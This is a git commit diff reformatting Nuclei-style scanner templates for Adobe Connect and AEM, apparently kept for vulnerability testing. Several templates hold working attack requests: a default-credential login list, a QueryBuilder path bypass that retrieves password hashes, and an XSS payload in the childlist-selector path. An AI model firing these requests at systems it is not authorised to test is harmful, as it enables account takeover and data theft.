20240924

adysec · Sep 24, 2024 · e22fd53 · e22fd53
1 parent c689db1
commit e22fd53
Show file tree

Hide file tree

Showing 1,353 changed files with 17,185 additions and 17,275 deletions.
diff --git a/date.txt b/date.txt
@@ -1 +1 @@
-20240923
+20240924
diff --git a/poc.txt b/poc.txt
diff --git a/poc/adobe/adobe-connect-central-login-95.yaml b/poc/adobe/adobe-connect-central-login-95.yaml
@@ -1,23 +1,23 @@
-id: adobe-connect-central-login
-
-info:
-  name: Adobe Connect Central Login
-  author: dhiyaneshDk
-  severity: info
-  tags: adobe,panel
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/system/login"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Adobe Connect Central Login</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+id: adobe-connect-central-login
+
+info:
+  name: Adobe Connect Central Login
+  author: dhiyaneshDk
+  severity: info
+  tags: adobe,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/system/login"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Adobe Connect Central Login</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/poc/adobe/adobe-connect-username-exposure.yaml b/poc/adobe/adobe-connect-username-exposure.yaml
@@ -2,10 +2,9 @@ id: adobe-connect-username-exposure
 
 info:
   name: Adobe Connect Username Exposure
+  reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
   author: dhiyaneshDk
   severity: low
-  reference:
-    - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
   tags: adobe,disclosure
 
 requests:

diff --git a/poc/adobe/aem-default-get-servlet.yaml b/poc/adobe/aem-default-get-servlet.yaml
@@ -1,26 +1,15 @@
 id: aem-default-get-servlet
-
 info:
-  name: AEM DefaultGetServlet
   author: DhiyaneshDk
+  name: AEM DefaultGetServlet
   severity: low
-  description: Sensitive information might be exposed via AEM DefaultGetServlet.
-  reference:
-    - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
-    - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
-  tags: aem,adobe
+  reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
+  tags: aem
+
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/etc'
-      - '{{BaseURL}}/var'
-      - '{{BaseURL}}/apps'
-      - '{{BaseURL}}/home'
-      - '{{BaseURL}}///etc'
-      - '{{BaseURL}}///var'
-      - '{{BaseURL}}///apps'
-      - '{{BaseURL}}///home'
       - '{{BaseURL}}/.json'
       - '{{BaseURL}}/.1.json'
       - '{{BaseURL}}/....4.2.1....json'

diff --git a/poc/adobe/aem-default-login.yaml b/poc/adobe/aem-default-login.yaml
@@ -1,4 +1,5 @@
 id: aem-default-login
+
 info:
   name: Adobe AEM Default Login
   author: random-robbie
@@ -10,9 +11,9 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
     cvss-score: 8.3
     cwe-id: CWE-522
-  metadata:
-    shodan-query: http.component:"Adobe Experience Manager"
   tags: aem,default-login,adobe
+
+
 requests:
   - raw:
       - |
@@ -23,37 +24,33 @@ requests:
         Referer: {{BaseURL}}/libs/granite/core/content/login.html
 
         _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
+
     attack: pitchfork
     payloads:
       aem_user:
         - admin
         - grios
         - replication-receiver
         - vgnadmin
-        - author
-        - anonymous
-        - jdoe@geometrixx.info
-        - aparker@geometrixx.info
+
       aem_pass:
         - admin
         - password
         - replication-receiver
         - vgnadmin
-        - author
-        - anonymous
-        - jdoe
-        - aparker
+
     stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         part: header
+        condition: and
         words:
           - login-token
           - crx.default
-        condition: and
 
 # Enhanced by mp on 2022/03/23
diff --git a/poc/adobe/aem-detection.yaml b/poc/adobe/aem-detection.yaml
@@ -1,19 +1,16 @@
-id: aem-detection
+id: favicon-detection-AEM
 
 info:
-  name: Favicon based AEM Detection
-  author: shifacyclewala,hackergautam
+  name: favicon-detection-AEM (Adobe Experience Manager)
   severity: info
-  reference:
+  author: shifacyclewala hackergautam
+  reference: |
     - https://twitter.com/brsn76945860/status/1171233054951501824
     - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
     - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
     - https://github.com/devanshbatham/FavFreak
     - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
-  metadata:
-    shodan-query: http.component:"Adobe Experience Manager"
-  tags: aem,favicon,tech,adobe
-
+      
 requests:
   - method: GET
     path:
@@ -24,5 +21,6 @@ requests:
 
     matchers:
       - type: dsl
+        name: "Adobe Experience Manager (AEM)"
         dsl:
           - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
diff --git a/poc/adobe/aem-groovyconsole-153.yaml b/poc/adobe/aem-groovyconsole-153.yaml
@@ -1,22 +1,19 @@
 id: aem-groovyconsole
 info:
-  name: AEM Groovy console enabled
-  author: Dheerajmadhukar
+  name: AEM Groovy console exposed
+  author: d3sca
   severity: critical
-  description: Groovy console is exposed, RCE is possible.
-  reference:
-    - https://hackerone.com/reports/672243
-    - https://twitter.com/XHackerx007/status/1435139576314671105
+  description: Groovy console is exposed.
   tags: aem
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/groovyconsole"
-      - "{{BaseURL}}/etc/groovyconsole.html"
+      - "{{BaseURL}}/groovyconsole.html"
     headers:
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
       Accept-Language: en-US,en;q=0.9,hi;q=0.8
-    stop-at-first-match: true
+      User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36
     matchers-condition: and
     matchers:
       - type: word

diff --git a/poc/adobe/aem-hash-querybuilder.yaml b/poc/adobe/aem-hash-querybuilder.yaml
@@ -1,19 +1,22 @@
 id: aem-hash-querybuilder
 info:
-  name: Query hashed password via QueryBuilder Servlet
   author: DhiyaneshDk
+  name: Query hashed password via QueryBuilder Servlet
   severity: medium
-  reference:
-    - https://twitter.com/AEMSecurity/status/1372392101829349376
+  reference: https://twitter.com/AEMSecurity/status/1372392101829349376
   tags: aem
 requests:
   - raw:
       - |
         GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
         Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Cache-Control: max-age=0
     matchers-condition: and
     matchers:
       - type: status
@@ -23,4 +26,3 @@ requests:
         words:
           - '"success":true'
           - 'rep:password'
-        condition: and
diff --git a/poc/adobe/aem-login-status.yaml b/poc/adobe/aem-login-status.yaml
@@ -12,6 +12,7 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/system/sling/loginstatus.css'
+
     matchers-condition: and
     matchers:
       - type: status
@@ -20,5 +21,4 @@ requests:
 
       - type: word
         words:
-          - 'CREDENTIAL_CHALLENGE'
-        condition: and
+          - 'CREDENTIAL_CHALLENGE'
diff --git a/poc/adobe/aem-querybuilder-feed-servlet.yaml b/poc/adobe/aem-querybuilder-feed-servlet.yaml
@@ -1,13 +1,13 @@
 id: aem-querybuilder-feed-servlet
 
 info:
-  name: AEM QueryBuilder Feed Servlet
   author: DhiyaneshDk
+  name: AEM QueryBuilder Feed Servlet
   severity: info
-  reference:
-    - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
+  reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
   tags: aem
 
+
 requests:
   - method: GET
     path:

diff --git a/poc/adobe/aem-secrets.yaml b/poc/adobe/aem-secrets.yaml
@@ -2,7 +2,7 @@ id: aem-secrets
 
 info:
   name: AEM Secrets - Sensitive Information Disclosure
-  author:  j3ssie & boobooHQ
+  author: j3ssie & boobooHQ
   severity: high
   reference:
     - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/

diff --git a/poc/adobe/aem-setpreferences-xss.yaml b/poc/adobe/aem-setpreferences-xss.yaml
@@ -1,12 +1,12 @@
 id: aem-setpreferences-xss
 info:
-  name: AEM setPreferences - Cross-Site Scripting
+  name: AEM setPreferences XSS
   author: zinminphy0,dhiyaneshDK
-  severity: medium
   reference:
     - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
     - https://github.com/projectdiscovery/nuclei-templates/issues/3225
     - https://twitter.com/zin_min_phyo/status/1465394815042916352
+  severity: medium
   tags: aem,xss
 requests:
   - method: GET

diff --git a/poc/adobe/aem-xss-childlist-selector-197.yaml b/poc/adobe/aem-xss-childlist-selector-197.yaml
@@ -1,30 +1,44 @@
 id: aem-xss-childlist-selector
+
 info:
-  name: XSS in childlist selector
+  name: Adobe Experience Manager - Cross-Site Scripting
   author: dhiyaneshDk
-  severity: medium
+  severity: high
   description: |
-    Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser.
+    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
   reference:
     - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java
+    - https://cystack.net/en/plugins/cystack.remote.aem_childlist_selector_xss
   metadata:
     shodan-query:
       - http.title:"AEM Sign In"
       - http.component:"Adobe Experience Manager"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: xss,aem,adobe
+
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html'
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - '<svg onload=alert(document.domain)>'
+          - '{"path":"/etc/designs/xh1x.childrenlist.json'
+        condition: and
+
       - type: word
         part: header
         words:
           - text/html
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/14